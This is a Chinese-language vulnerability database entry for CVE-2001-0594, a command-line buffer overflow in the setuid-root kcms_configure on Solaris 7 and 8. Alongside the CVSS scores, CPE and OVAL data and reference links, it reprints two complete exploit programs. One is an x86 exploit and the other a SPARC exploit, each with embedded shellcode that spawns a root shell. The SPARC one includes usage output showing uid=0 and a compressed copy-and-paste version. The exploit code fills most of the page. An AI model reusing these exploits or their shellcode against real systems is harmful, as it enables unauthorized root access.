CVE-2001-0594
CVSS4.6
发布时间 :2001-08-02 00:00:00
修订时间 :2008-09-05 16:24:29
NMCOE    

[原文]kcms_configure as included with Solaris 7 and 8 allows a local attacker to gain additional privileges via a buffer overflow in a command line argument.


[CNNVD]Solaris kcms_configure获取额外特权漏洞(CNNVD-200108-012)

        包含在Solaris 7和8版本中的kcms_configure存在漏洞。本地攻击者借助命令行参数中的缓冲区溢出获取额外的特权。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:8.0::x86

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:7Solaris 8 kcms_configure Command-Line Buffer Overflow
oval:org.mitre.oval:def:65Solaris 7 kcms_configure Command-Line Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0594
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0594
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-012
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6359.php
(VENDOR_ADVISORY)  XF  solaris-kcms-command-bo(6359)
http://archives.neohapsis.com/archives/bugtraq/2001-04/0140.html
(VENDOR_ADVISORY)  BUGTRAQ  20010409 Solaris kcms_configure vulnerability
http://www.securityfocus.com/bid/2558
(VENDOR_ADVISORY)  BID  2558

- 漏洞信息

Solaris kcms_configure获取额外特权漏洞
中危 缓冲区溢出
2001-08-02 00:00:00 2005-05-02 00:00:00
本地  
        包含在Solaris 7和8版本中的kcms_configure存在漏洞。本地攻击者借助命令行参数中的缓冲区溢出获取额外的特权。

- 公告与补丁

        

- 漏洞信息 (20740)

Solaris 7/8 kcms_configure Command-Line Buffer Overflow Vulnerability (1) (EDBID:20740)
solaris local
2001-04-09 Verified
0 Riley Hassell
N/A [点击下载]
source: http://www.securityfocus.com/bid/2558/info

The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.

An exploit for x86 Solaris is available to attackers. 

/*
 Command line argument overflow
 /usr/openwin/bin/kcms_configure

 Proof of Concept Exploitation
 Riley Hassell
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFLEN  1100

/* seteuid/exec shellcode  */
char shell[] =
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
"\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
"\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
"\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
"\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
"\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

unsigned long int get_esp() { __asm__("movl %esp,%eax");}

int main (int argc, char *argv[])
{
        int i;
        if (argc > 1)
        offset = strtol(argv[1], NULL, 0);
        else
             offset = -300;
            nop = 600;
        esp = get_esp();
        memset(buf, 0x90, BUFLEN);
        memcpy(buf+600, shell, strlen(shell));
        for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
        *((int *) &buf[i]) = esp+offset;
         buf[BUFLEN-1] = '\0';
        execl("/usr/openwin/bin/kcms_configure", "eEye",
"-o","-S","X",buf,NULL);
        return;
}
		

- 漏洞信息 (20741)

Solaris 7/8 kcms_configure Command-Line Buffer Overflow Vulnerability (2) (EDBID:20741)
solaris local
2001-04-09 Verified
0 Adam Slattery
N/A [点击下载]
source: http://www.securityfocus.com/bid/2558/info
 
The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.
 
An exploit for x86 Solaris is available to attackers. 

/* kcms_configure -o -S command line buffer overflow, SPARC/solaris 8
 *
 * http://www.securityfocus.com/bid/2558
 *
 * Coded June 22, 2002 by Adam Slattery. Phear. The vulnerability
 * was discovered a long time ago (04/2001), but there haven't been
 * any published sparc exploits as far as I know (only x86).
 *
 * Adam Slattery <aslattery@sunriselinux.com>
 *
 * DESCRIPTION:
 *
 * The i386/solaris 8 exploit by eEye (Riley Hassell) was trivial. A
 * sparc version is somewhat more complicated, but not daunting. Because
 * of the location of the overflow in the program, quite a bit of code
 * gets executed before the second return (which is the jump to
 * shellcode in a sparc overflow). Some of this code relies on the
 * registers being set, and we're overwriting the saved registers
 * when we overflow the stack buffer. To remedy this situation we
 * need to overflow the stack very carefully because in the process
 * of overwriting the saved i7 register (return address), we overwrite
 * the l0-07 and i0-i6 [fp] registers. The code that gets executed before
 * the second return makes use of a few of these overwritten registers.
 * So... we overwrite these saved registers with a "good" address that
 * points to a pointer, so pretty much any code using values in the
 * registers won't try to access illegal memory and cause a seg fault.
 * It may sound sketchy, but it works.
 *
 * USAGE:
 *
 * gcc kcms_sparc.c -o kcms_sparc
 * ./kcms_sparc [offset] [ptr addr]
 *
 * $ ./kcms_sparc
 * ret address: 0xffbee4f8 [3036]  ptr address: 0xffbeecf8 buflen: 1085
 * # id
 * uid=0(root) gid=100(users)
 *
 *
 * The default offset (3036) should work. 4800 also works. Read the note
 * by the address calculations to see why (there are 2 buffers). Even
 * though it's a 1024 byte buffer, there aren't too many nops left in
 * the second buffer when everything is set so if you have to search
 * for the offet by hand, use increments of 64.
 * The [ptr addr] is an address in memory that points to a pointer.
 * This is loaded into some of the registers that get used before the
 * program jumps into shell code. If the default (0xffbeecf8) doesn't
 * work you, you probably won't be able to make a guess, so you'll
 * have to whip out gdb. If you don't have r00t (most likely), you'll
 * have to use a copy (non-suid) of kcms_configure and LD_PRELOAD a lib
 * to return 0 for geteuid/getegid (so it wonn't detect it's not uid 0).
 *
 *
 * Thanks: optyx, t12, worms, miah, Sun Microsystems, Kodak...
 *
 * Langrets - thanks for making me cookies after I had surgery, which
 *    was the week before I actually released this. They tasted 31337++.
 *
 *
 * random greetz: xexen, rogers, kanu, cyun, cua0, dap, f3tus, xaiou,
 *		langrets, janebond, applejacks, wisdmckr3, cbo2000
 *
 * stupid people: #legions (esp. digiebola, pr00f, gridmark),
 *		MIT, Stanford, Olin (those bastards all turned me down)
 */

#include <stdio.h>
#include <unistd.h>

/* some .s asm code was used from dopesquad.net */
u_char shellcode[] = /* aslattery@sunriselinux.com */

//setuid(0)
  "\x90\x1b\xc0\x0f" /* xor	%o7,%o7,%o0 */
  "\x82\x10\x20\x17" /* mov	23,%g1 */
  "\x91\xd0\x20\x08" /* ta	8 */

/* For some messed up reason it doesn't seem to work if i
 * use one or the other syscall, but it does if i use both. I
 * don't feel like playing with shellcode anymore right now, and
 * this works, so I don't care.
 */
//setreuid(0,0)
  "\x92\x1a\x40\x09" /* xor	%o1,%o1,%o1 */
  "\x82\x10\x20\xca" /* mov	202, %g1 */
  "\x91\xd0\x20\x08" /* ta	8 */

//exec(/bin/sh)
  "\x21\x0b\xd8\x9a" /* sethi	%hi(0x2f626800), %l0 */
  "\xa0\x14\x21\x6e" /* or	%l0, 0x16e, %l0 ! 0x2f62696e */
  "\x23\x0b\xdc\xda" /* sethi	%hi(0x2f736800), %l1 */
  "\x90\x23\xa0\x10" /* sub	%sp, 16, %o0 */
  "\x92\x23\xa0\x08" /* sub	%sp, 8, %o1 */
  "\x94\x1b\x80\x0e" /* xor	%sp, %sp, %o2 */
  "\xe0\x3b\xbf\xf0" /* std	%l0, [%sp - 16] */
  "\xd0\x23\xbf\xf8" /* st	%o0, [%sp - 8] */
  "\xc0\x23\xbf\xfc" /* st	%g0, [%sp - 4] */
  "\x82\x10\x20\x3b" /* mov	59, %g1 */
  "\x91\xd0\x20\x08" /* ta	8 */
;

u_char NOP[4] = "\xa6\x1c\xc0\x13"; /* xor %l3, %l3, %l3 */


/* we need 1085 bytes to overwrite saved i7 */
/* the vulnerable buffer is a 1024 bytes long */
#define BIGBUF 1086

/* Offsets to saved registers in relation to the bottom of the buffer: */
#define l0_OFFSET 1025
#define i7_OFFSET 1081


/* figure out where the stack starts so we have a rough guestimation */
u_long get_sp(void)
{
   __asm__("mov %sp, %i0\n");
}

int main(int argc, char **argv)
{
   u_char buf[BIGBUF+6];
   int i, offset;
   u_long addr;
   u_long paddr;

   if(argc > 1)
      if(!strcmp(argv[1], "-h") || !strcmp(argv[1], "--help"))
       {
         printf("%s [retaddr offset] [ptraddr]\n", argv[0]);
         exit(0);
       }

   /* Calculate the return address to put in i7.
    * 3036 should dump us into the nops just fine.
    * We actually have 2 different windows with about 900 bytes
    * of nops each because the buffer we overflow gets copied into
    * another 1024 byte buffer directly below it on the stack.
    * This actually overwrites the first couple hundred nops,
    * but we still have a bunch, so it's ok.
    */
   addr = get_sp();
   if(argc > 1)
      offset = atoi(argv[1]);
   else
      offset = 3036;
   addr -= offset;

   if(argc > 2)
      paddr = strtoul(argv[2], NULL, 0);
   else
      paddr = 0xffbeecf8; //0xffbee3e8 might work too;

   memset(buf, 255, BIGBUF);

   /* Copy NOPS until ~80 bytes before the end of vulnbuf */
   for(i = 1; i < 940 ; i+=4)
      memcpy(buf+i, NOP, 4);

   /* Copy shellcode */
   memcpy(buf+i, shellcode, strlen(shellcode));

   /* because so much code gets executed before the second return, we
    * have to overwrite the stack with very precise data. Finding the
    * right values takes some time in gdb, but it turns out we just need
    * a value that points to some valid memory that points somewhere else.
    * Additionally, this address + 8 needs to do the same. So we need a 
    * string of pointers to pointers. Luckily, this happens quite
    * frequently by blind luck. It just takes some searching in gdb.
    *
    * We just fill all the registers (except i7) with this address. I
    * started with just i1, i4, and i6(fp), and this worked great
    * testing as a normal user, but the program's execution is slightly
    * different when it runs as root (mkdir doesn't fail :), so it was
    * seg faulting and i couldn't figure out why (debugging suid binaries
    * as a normal user is impossible :). So instead of wrapping all these
    * damn library calls through my LD_PRELOADed geteuid() library, I
    * tried filling all the registers. b00m. It worked.
    */

   /* l0-l7 and i0-i6(fp) */
   for(i=l0_OFFSET ; i < i7_OFFSET ; i+=4)
      memcpy(&buf[i], &paddr, 4);

   /* i7, return address */
   memcpy(&buf[i7_OFFSET], &addr, 4);

   /* Null terminate */
   buf[i7_OFFSET+4] = '\0';

   printf("ret address: 0x%x [%d]  ptr address: 0x%x  len: %d\n", \
		addr, offset, paddr, strlen(buf));
   /* b00m! */
   execl("/usr/X/bin/kcms_configure", "pine", "-o", "-S", \
	"blah", buf, NULL);

   puts("execl failed");
return 0;
}



#ifdef UGLY_COPY_AND_PASTE_VERSION
// Fits in a single terminal screen, makes it easier to copy&paste
// the exploit to a remote system. Maybe I'm being a little bit too
// nice to the kiddies? It even has a nice smiley face :)
// ... BEGIN ...

#include <stdio.h>
#include <sys/types.h>
u_char shellcode[] =
"\x90\x1b\xc0\x0f\x82\x10\x20\x17\x91\xd0\x20\x08\x92\x1a\x40\x09"
"\x82\x10\x20\xca\x91\xd0\x20\x08\x21\x0b\xd8\x9a\xa0\x14\x21\x6e"
"\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\x94\x1b\x80\x0e"
"\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
"\x91\xd0\x20\x08"; u_char NOP[4]="\xa6\x1c\xc0\x13"; u_long
get_sp(void){__asm__("mov %sp, %i0\n");}int main(int ac,char **av)
{ u_char    buf[1092];int i,    offset; u_long addr; u_long pa;
if(ac>1)    if(!strcmp(av[1],   "-h")||!strcmp(av[1],"--help")) {
printf("%s  [retaddr offset]    [ptraddr]\n", av[0]); exit(0); }
addr=get_sp(); if(   ac>1) offset=atoi(av[1]); else offset=3036;
addr-=offset;if(ac   >2)pa=strtoul(av[2],NULL,0);else pa=0xffbeecf8;
memset(buf    ,255,1086);for   (i=1;i<940;i+=4) memcpy(buf+i,NOP,4);
memcpy(buf+    i,shellcode    ,strlen(shellcode)); for(i=1025;i<1081;
i+=4) memcpy(               &buf[i], &pa, 4); memcpy(&buf[1081],
&addr,4);buf[1085]='\0';printf("ret: 0x%x [%d] ptr: 0x%x len: %d\n",
addr,offset,pa,strlen(buf)); execl("/usr/X/bin/kcms_configure",
"pine","-o","-S","blah",buf,NULL); puts("exec failed"); return 0; }
// ... END ...
#endif
		

- 漏洞信息

14817
Solaris kcms_configure Command Line Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2001-04-09 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站